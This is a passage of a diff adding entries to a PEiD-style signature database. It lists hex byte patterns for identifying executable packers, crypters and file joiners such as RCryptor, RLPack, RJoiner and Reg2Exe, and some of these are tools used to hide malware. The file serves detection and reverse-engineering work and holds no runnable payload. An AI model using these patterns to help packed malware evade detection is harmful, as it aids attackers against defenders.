+signature = 68 00 20 40 00 E8 C3 01 00 00 80 38 00 74 0D 66 81 78 FE 22 20 75 02 EB 03 40 EB EE 8B F8 B8 04 60 40 00 68 C4 20 40 00 68 D4 20 40 00 6A 00 6A 00 6A 04 6A 00 6A 00 6A 00 57 50 E8 9F 01 00 00 85 C0 0F 84 39 01 00 00 BE 00 60 40 00 8B 06 A3 28 21 40 00 83
+ep_only = false
+
+[RatPacker (Glue) stub]
+signature = 40 20 FF 00 00 00 00 00 00 00 ?? BE 00 60 40 00 8D BE 00 B0 FF FF
+ep_only = true
+
+[RAZOR 1911 encruptor]
+signature = E8 ?? ?? BF ?? ?? 3B FC 72 ?? B4 4C CD 21 BE ?? ?? B9 ?? ?? FD F3 A5 FC
+ep_only = true
+
+[RCryptor 1.5 -> Vaska]
+signature = 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? ?? EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor 1.6c -> Vaska]
+signature = 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor 2.0 -> Vaska]
+signature = F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? ?? ?? ?? F7 D1 83 F1 FF
+ep_only = true
+
+[RCryptor v1.1 --> Vaska]
+signature = 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0
+ep_only = false
+
+[RCryptor v1.1 --> Vaska]
+signature = 8B 04 24 83 E8 4F 68 ?? ?? ?? ?? FF D0 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = false
+
+[RCryptor v1.3 / v1.4 --> Vaska]
+signature = 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50
+ep_only = true
+
+[RCryptor v1.3 / v1.4 --> Vaska]
+signature = 55 8B EC 8B 44 24 04 83 E8 4F 68 ?? ?? ?? ?? FF D0 58 59 50 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.3b --> Vaska]
+signature = 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7
+ep_only = true
+
+[RCryptor v1.3b --> Vaska]
+signature = 61 83 EF 4F 60 68 ?? ?? ?? ?? FF D7 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.5 (Private) --> Vaska]
+signature = 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.5 --> Vaska]
+signature = 83 2C 24 4F 68 ?? ?? ?? ?? FF 54 24 04 83 44 24 04 4F
+ep_only = true
+
+[RCryptor v1.6 -> Vaska]
+signature = 33 D0 68 ?? ?? ?? ?? FF D2
+ep_only = true
+
+[RCryptor v1.6 -> Vaska]
+signature = 33 D0 68 ?? ?? ?? ?? FF D2 B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.6b / v1.6c --> Vaska]
+signature = 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68
+ep_only = true
+
+[RCryptor v1.6b / v1.6c --> Vaska]
+signature = 8B C7 03 04 24 2B C7 80 38 50 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.6d --> Vaska]
+signature = 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68
+ep_only = true
+
+[RCryptor v1.6d --> Vaska]
+signature = 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = false
+
+[RCryptor V1.6d -> Vaska]
+signature = 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3 B8 ?? ?? ?? ?? 90 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v1.6x --> Vaska]
+signature = 60 90 61 61 80 7F F0 45 90 60 0F 85 1B 8B 1F FF 68 ?? ?? ?? ?? C3
+ep_only = true
+
+[RCryptor v1.?? -> Vaska]
+signature = 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68
+ep_only = true
+
+[RCryptor v1.?? -> Vaska]
+signature = 90 58 90 50 90 8B 00 90 3C 50 90 58 0F 85 67 D6 EF 11 50 68 ?? ?? ?? ?? B8 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 06 80 30 ?? 40 EB F3
+ep_only = true
+
+[RCryptor v2.0 (Hide EP) --> Vaska]
+signature = F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 DC 20 ?? 00 F7 D1 83 F1 FF E8 00 00 00 00 F7 D1 83 F1 FF C3
+ep_only = true
+
+[RCryptor v2.0 --> Vaska]
+signature = F7 D1 83 F1 FF 6A 00 F7 D1 83 F1 FF 81 04 24 ?? 02 00 00 F7 D1 83 F1 FF 59 BA 32 21 ?? 00 F7 D1 83 F1 FF F7 D1 83 F1 FF 80 02 E3 F7 D1 83 F1 FF C0 0A 05 F7 D1 83 F1 FF 80 02 6F F7 D1 83 F1 FF 80 32 A4 F7 D1 83 F1 FF 80 02 2D F7 D1 83 F1 FF 42 49 85 C9 75 CD 1C 4F 8D 5B FD 62 1E 1C 4F 8D 5B FD 4D 9D B9 ?? ?? ?? 1E 1C 4F 8D 5B FD 22 1C 4F 8D 5B FD 8E A2 B9 B9 E2 83 DB E2 E5 4D CD 1E BF 60 AB 1F 4D DB 1E 1E 3D 1E 92 1B 8E DC 7D EC A4 E2 4D E5 20 C6 CC B2 8E EC 2D 7D DC 1C 4F 8D 5B FD 83 56 8E E0 3A 7D D0 8E 9D 6E 7D D6 4D 25 06 C2 AB 20 CC 3A 4D 2D 9D 6B 0B 81 45 CC 18 4D 2D 1F A1 A1 6B C2 CC F7 E2 4D 2D 9E 8B 8B CC DE 2E 2D F7 1E AB 7D 45 92 30 8E E6 B9 7D D6 8E 9D 27 DA FD FD 1E 1E 8E DF B8 7D CF 8E A3 4D 7D DC 1C 4F 8D 5B FD 33 D7 1E 1E 1E A6 0B 41 A1 A6 42 61 6B 41 6B 4C 45 1E 21 F6 26 BC E2 62 1E 62 1E 62 1E 23 63 59 ?? 1E 62 1E 62 1E 33 D7 1E 1E 1E 85 6B C2 41 AB C2 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 20 33 9E 1E 1E 1E 85 A2 0B 8B C2 27 41 EB A1 A2 C2 1E C0 FD F0 FD 30 62 1E 33 7E 1E 1E 1E C6 2D 42 AB 9F 23 6B C2 41 A1 1E C0 FD F0 FD 30 C0 FD F0 8E 1D 1C 4F 8D 5B FD E0 00 33 5E 1E 1E 1E BF 0B EC C2 E6 42 A2 C2 45 1E C0 FD F0 FD 30 CE 36 CC F2 1C 4F 8D 5B FD
+ep_only = true
+
+[RE-Crypt v0.7x -> Crudd [RET] (h1)]
+signature = 60 E8 00 00 00 00 5D 81 ED F3 1D 40 00 B9 7B 09 00 00 8D BD 3B 1E 40 00 8B F7 61 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B
+ep_only = true
+
+[RE-Crypt v0.7x -> Crudd [RET] (h2)]
+signature = 60 E8 00 00 00 00 5D 55 81 04 24 0A 00 00 00 C3 8B F5 81 C5 ?? ?? 00 00 89 6D 34 89 75 38 8B 7D 38 81 E7 00 FF FF FF 81 C7 48 00 00 00 47 03 7D 60 8B 4D 5C 83 F9 00 7E 0F 8B 17 33 55 58 89 17 83 C7 04 83 C1 FC EB EC 8B
+ep_only = true
+
+[Reflexive Arcade Wrapper]
+signature = 55 8B EC 6A FF 68 98 68 42 00 68 14 FA 41 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 F8 50 42 00 33 D2 8A D4 89 15 3C E8 42 00 8B C8 81 E1 FF 00 00 00 89 0D 38 E8 42 00 C1 E1 08 03 CA 89 0D 34 E8 42 00 C1 E8 10 A3 30 E8
+ep_only = true
+
+[Reg2Exe 2.20/2.21 - by Jan Vorel]
+signature = 6A 00 E8 7D 12 00 00 A3 A0 44 40 00 E8 79 12 00 00 6A 0A 50 6A 00 FF 35 A0 44 40 00 E8 0F 00 00 00 50 E8 69 12 00 00 CC CC CC CC CC CC CC CC CC 68 2C 02 00 00 68 00 00 00 00 68 B0 44 40 00 E8 3A 12 00 00 83 C4 0C 8B 44 24 04 A3 B8 44 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 32 12 00 00 A3 B0 44 40 00 68 F4 01 00 00 68 BC 44 40 00 FF 35 B8 44 40 00 E8 1E 12 00 00 B8 BC 44 40 00 89 C1 8A 30 40 80 FE 5C 75 02 89 C1 80 FE 00 75 F1 C6 01 00 E8 EC 18 00 00 E8 28 16 00 00 E8 4A 12 00 00 68 00 FA 00 00 68 08 00 00 00 FF 35 B0 44 40 00 E8 E7 11 00 00 A3 B4 44 40 00 8B 15 D4 46 40 00 E8 65 0A 00 00 BB 00 00 10 00 B8 01 00 00 00 E8 72 0A 00 00 74 09 C7 00 01 00 00 00 83 C0 04 A3 D4 46 40 00 FF 35 B4 44 40 00 E8 26 05 00 00 8D 0D B8 46 40 00 5A E8 CF 0F 00 00 FF 35 B4 44 40 00 FF 35 B8 46 40 00 E8 EE 06 00 00 8D 0D B4 46 40 00 5A E8
+ep_only = true
+
+[Reg2Exe 2.22/2.23 - by Jan Vorel]
+signature = 6A 00 E8 2F 1E 00 00 A3 C4 35 40 00 E8 2B 1E 00 00 6A 0A 50 6A 00 FF 35 C4 35 40 00 E8 07 00 00 00 50 E8 1B 1E 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 C8 35 40 00 E8 76 16 00 00 83 C4 0C 8B 44 24 04 A3 CC 35 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 EC 1D 00 00 A3 C8 35 40 00 E8 62 1D 00 00 E8 92 1A 00 00 E8 80 16 00 00 E8 13 14 00 00 68 01 00 00 00 68 08 36 40 00 68 00 00 00 00 8B 15 08 36 40 00 E8 71 3F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 3F 00 00 FF 35 48 31 40 00 B8 00 01 00 00 E8 0D 13 00 00 8D 0D EC 35 40 00 5A E8 F2 13 00 00 68 00 01 00 00 FF 35 EC 35 40 00 E8 84 1D 00 00 A3 F4 35 40 00 FF 35 48 31 40 00 FF 35 F4 35 40 00 FF 35 EC 35 40 00 E8
+ep_only = true
+
+[Reg2Exe 2.24 - by Jan Vorel]
+signature = 6A 00 E8 CF 20 00 00 A3 F4 45 40 00 E8 CB 20 00 00 6A 0A 50 6A 00 FF 35 F4 45 40 00 E8 07 00 00 00 50 E8 BB 20 00 00 CC 68 48 00 00 00 68 00 00 00 00 68 F8 45 40 00 E8 06 19 00 00 83 C4 0C 8B 44 24 04 A3 FC 45 40 00 68 00 00 00 00 68 A0 0F 00 00 68 00 00 00 00 E8 8C 20 00 00 A3 F8 45 40 00 E8 02 20 00 00 E8 32 1D 00 00 E8 20 19 00 00 E8 A3 16 00 00 68 01 00 00 00 68 38 46 40 00 68 00 00 00 00 8B 15 38 46 40 00 E8 71 4F 00 00 B8 00 00 10 00 BB 01 00 00 00 E8 82 4F 00 00 FF 35 48 41 40 00 B8 00 01 00 00 E8 9D 15 00 00 8D 0D 1C 46 40 00 5A E8 82 16 00 00 68 00 01 00 00 FF 35 1C 46 40 00 E8 24 20 00 00 A3 24 46 40 00 FF 35 48 41 40 00 FF 35 24 46 40 00 FF 35 1C 46 40 00 E8 DC 10 00 00 8D 0D 14 46 40 00 5A E8 4A 16
+ep_only = true
+
+[Reg2Exe 2.25 - by Jan Vorel]
+signature = 68 68 00 00 00 68 00 00 00 00 68 70 7D 40 00 E8 AE 20 00 00 83 C4 0C 68 00 00 00 00 E8 AF 52 00 00 A3 74 7D 40 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 9C 52 00 00 A3 70 7D 40 00 E8 24 50 00 00 E8 E2 48 00 00 E8 44 34 00 00 E8 54 28 00 00 E8 98 27 00 00 E8 93 20 00 00 68 01 00 00 00 68 D0 7D 40 00 68 00 00 00 00 8B 15 D0 7D 40 00 E8 89 8F 00 00 B8 00 00 10 00 68 01 00 00 00 E8 9A 8F 00 00 FF 35 A4 7F 40 00 68 00 01 00 00 E8 3A 23 00 00 8D 0D A8 7D 40 00 5A E8 5E 1F 00 00 FF 35 A8 7D 40 00 68 00 01 00 00 E8 2A 52 00 00 A3 B4 7D 40 00 FF 35 A4 7F 40 00 FF 35 B4 7D 40 00 FF 35 A8 7D 40 00 E8 5C 0C 00 00 8D 0D A0 7D 40 00 5A E8 26 1F 00 00 FF 35
+ep_only = true
+
+[ReversingLabsProtector 0.7.4 beta -> Ap0x]
+signature = 68 00 00 41 00 E8 01 00 00 00 C3 C3
+ep_only = true
+
+[RJcrush v1.00]
+signature = 06 FC 8C C8 BA ?? ?? 03 D0 52 BA ?? ?? 52 BA ?? ?? 03 C2 8B D8 05 ?? ?? 8E DB 8E C0 33 F6 33 FF B9
+ep_only = true
+
+[RJoiner 1.2 by Vaska (25.03.2007 16:58)]
+signature = 55 8B EC 81 EC 0C 02 00 00 8D 85 F4 FD FF FF 56 50 68 04 01 00 00 FF 15 14 10 40 00 90 8D 85 F4 FD FF FF 50 FF 15 10 10 40 00 90 BE 00 20 40 00 90 83 3E FF 0F 84 84 00 00 00 53 57 33 FF 8D 46
+ep_only = true
+
+[RJoiner 1.2a -> Vaska]
+signature = 55 8B EC 81 EC 0C 01 00 00 8D 85 F4 FE FF FF 56 50 68 04 01 00 00 FF 15 0C 10 40 00 94 90 94 8D 85 F4 FE FF FF 50 FF 15 08 10 40 00 94 90 94 BE 00 20 40 00 94 90 94 83 3E FF 74 7D 53 57 33 DB 8D 7E 04 94 90 94 53 68 80 00 00 00 6A 02 53 6A 01 68 00 00 00 C0 57 FF 15 04 10 40 00 89 45 F8 94 90 94 8B 06 8D 74 06 04 94 90 94 8D 45 FC 53 50 8D 46 04 FF 36 50 FF 75 F8 FF 15 00 10 40 00 94 90 94 FF 75 F8 FF 15 10 10 40 00 94 90 94 8D 85 F4 FE FF FF 6A 0A 50 53 57 68 20 10 40 00 53 FF 15 18 10 40 00 94 90 94 8B 06 8D 74 06 04 94 90 94 83 3E FF 75 89 5F 5B 33 C0 5E C9 C2 10 00 CC CC 24 11
+ep_only = false
+
+[RJoiner by Vaska (Sign from pinch 25.03.2007 17:00)]
+signature = E8 03 FD FF FF 6A 00 E8 0C 00 00 00 FF 25 6C 10 40 00 FF 25 70 10 40 00 FF 25 74 10 40 00 FF 25 78 10 40 00 FF 25 7C 10 40 00 FF 25 80 10 40 00 FF 25 84 10 40 00 FF 25 88 10 40 00 FF 25 8C 10
+ep_only = true
+
+[RLP V0.7.3.beta -> ap0x]
+signature = 2E 72 6C 70 00 00 00 00 00 50 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 E0
+ep_only = false
+
+[RLP v0.7.3beta -> ap0x]
+signature = 60 8B DD E8 00 00 00 00 5D 95 32 C0 95 89 9D 80 00 00 00 B8 42 31 40 00 BB 41 30 40 00 2B C3 03 C5 33 D2 8A 10 40 B9 ?? ?? 00 00 8B F9 30 10 8A 10 40 49 75 F8 64 EF 86 3D 30 00 00 0F B9 FF 4B 89 52 5C 4C BD 77 C2 0C CE 88 4E 2D E8 00 00 00 5D 0D DB 5E 56
+ep_only = false
+
+[RLPack --> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 CD 09 00 00 89 85 14 0A 00 00 EB 14 60 FF B5 14 0A
+ep_only = true
+
+[RLPack --> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 83 01 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 EB 09 00 00 89 85 3A 0A 00 00 EB 14 60 FF B5 3A 0A
+ep_only = true
+
+[RLPack --> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 0C 00 00 EB 03 0C 00 00 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 47 02 00 00 EB 03 15 00 00 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 9B 0A
+ep_only = true
+
+[RLPack -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 2C 0A 00 00 8D 9D 22 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 CD 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 14 0A
+ep_only = true
+
+[RLPack -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85 ?? ?? ?? ?? EB 14 60 FF B5 3A 0A
+ep_only = true
+
+[RLPack -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 EB 03 ?? ?? ?? EB 03 ?? ?? ?? 8D B5 CB 22 00 00 8D 9D F0 02 00 00 33 FF E8 ?? ?? ?? ?? EB 03 ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 9B 0A
+ep_only = true
+
+[RLPack 1.0 beta -> ap0x]
+signature = 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5
+ep_only = true
+
+[RLPack 1.0 beta -> ap0x]
+signature = 60 E8 00 00 00 00 8D 64 24 04 8B 6C 24 FC 8D B5 4C 02 00 00 8D 9D 13 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 ?? ?? ?? ?? 6A 00 FF 95 F9 01 00 00 89 85 48 02 00 00 5B FF B5 48 02 00 00 56 FF D3 83 C4 08 8B B5 48 02 00 00 8B C6 EB 01 40 80 38 01 75 FA 40 8B 38 83 C0 04 89 85 44 02 00 00 EB 7A 56 FF 95 F1 01 00 00 89 85 40 02 00 00 8B C6 EB 4F 8B 85 44 02 00 00 8B 00 A9 00 00 00 80 74 14 35 00 00 00 80 50 8B 85 44 02 00 00 C7 00 20 20 20 00 EB 06 FF B5 44 02 00 00 FF B5 40 02 00 00 FF 95 F5 01 00 00 89 07 83 C7 04 8B 85 44 02 00 00 EB 01 40 80 38 00 75 FA 40 89 85 44 02 00 00 80 38 00 75 AC EB 01 46 80 3E 00 75 FA 46 40 8B 38 83 C0 04 89 85 44 02 00 00 80 3E 01 75 81 68 00 40 00 00 68 ?? ?? ?? ?? FF B5 48 02 00 00 FF 95 FD 01 00 00 61 68 ?? ?? ?? ?? C3 60 8B 74 24 24 8B 7C
+ep_only = true
+
+[RLPack 1.1 BasicEdition -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68
+ep_only = true
+
+[RLPack 1.18 (aPlib 0.43) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01
+ep_only = true
+
+[RLPack 1.18 (LZMA 4.30) -> ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 21 0B 00 00 8D 9D FF 02 00 00 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 ?? 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01
+ep_only = true
+
+[RLPack 1.18 Dll (aPlib 0.43) -> ap0x]
+signature = 80 7C 24 08 01 0F 85 5C 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 ?? 8D B5 1A 04 00 00 8D 9D C1 02 00 00 33 FF E8 61 01 00 00 EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 ?? 83 C7 ?? 83 3C 37 00 75 EB 83 BD 06 04 00 00 00 74 0E 83 BD 0A 04 00 00 00 74 05 E8 D7 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 A7 03 00 00 89 85 16 04 00 00 5B FF B5 16 04 00 00 56 FF D3 83 C4 ?? 8B B5 16 04 00 00 8B C6 EB 01
+ep_only = true
+
+[RLPack 1.18 Dll (LZMA 4.30) -> ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? 01 00 00 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8 9F 01 00 00 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 F9 0A 00 00 EB 14 60 FF B5 F9 0A 00 00 FF 34 37 FF 74 37 04 FF D3 61 83 C7 08 83 3C 37 00 75 E6 83 BD 0D 0B 00 00 00 74 0E 83 BD 11 0B 00 00 00 74 05 E8 F6 01 00 00 8D 74 37 04 53 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 95 AA 0A 00 00 89 85 1D 0B 00 00 5B 60 FF B5 F9 0A 00 00 56 FF B5 1D 0B 00 00 FF D3 61 8B B5 1D 0B 00 00 8B C6 EB 01
+ep_only = true
+
+[RLPack 1.20 Basic Edition [aPLib] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 92 05 00 00 EB 0C 8B 85 8E 05 00 00 89 85 92 05 00 00 8D B5 BA 05 00 00 8D 9D 41 04 00 00 33 FF E8 38 01 00 00 EB 1B 8B 85 92 05 00 00 FF 74 37 04 01 04 24 FF 34 37 01 04 24 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 DF 83 BD 9E 05 00 00 00 74 0E 83 BD A2 05 00 00 00 74 05 E8 D6 01 00 00
+ep_only = true
+
+[RLPack 1.20 Basic Edition [LZMA] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 83 7C 24 28 01 75 0C 8B 44 24 24 89 85 9C 0C 00 00 EB 0C 8B 85 98 0C 00 00 89 85 9C 0C 00 00 8D B5 C4 0C 00 00 8D 9D 82 04 00 00 33 FF 6A 40 68 00 10 00 00 68 00 20 0C 00 6A 00 FF 95 2D 0C 00 00 89 85 94 0C 00 00 E8 59 01 00 00 EB 20 60 8B 85 9C 0C 00 00 FF B5 94 0C 00 00 FF 34 37 01 04 24 FF 74 37 04 01 04 24 FF D3 61 83
+ep_only = true
+
+[RLPack Full Edition 1.17 -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF
+ep_only = true
+
+[RLPack Full Edition 1.17 DLL -> Ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 ?? ?? ?? ?? 8D 9D ?? ?? ?? ?? 33 FF E8
+ep_only = true
+
+[RLPack Full Edition 1.17 DLL [aPLib] -> Ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 53 03 00 00 8D 9D 02 02 00 00 33 FF E8 ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75
+ep_only = true
+
+[RLPack Full Edition 1.17 DLL [LZMA] -> Ap0x]
+signature = 80 7C 24 08 01 0F 85 ?? ?? ?? ?? 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 5A 0A 00 00 8D 9D 40 02 00 00 33 FF E8 ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 95 EB 09 00 00 89 85
+ep_only = true
+
+[RLPack Full Edition 1.17 iBox [aPLib] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 79 29 00 00 8D 9D 2C 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34
+ep_only = true
+
+[RLPack Full Edition 1.17 iBox [LZMA] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 67 30 00 00 8D 9D 66 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+ep_only = true
+
+[RLPack Full Edition 1.17 [aPLib] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 74 1F 00 00 8D 9D 1E 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? EB 0F FF 74 37 04 FF 34
+ep_only = true
+
+[RLPack Full Edition 1.17 [LZMA] -> Ap0x]
+signature = 60 E8 00 00 00 00 8B 2C 24 83 C4 04 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8D B5 73 26 00 00 8D 9D 58 03 00 00 33 FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 6A 40 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A
+ep_only = true
+
+[RLPack Full Edition V1.1X -> ap0x]
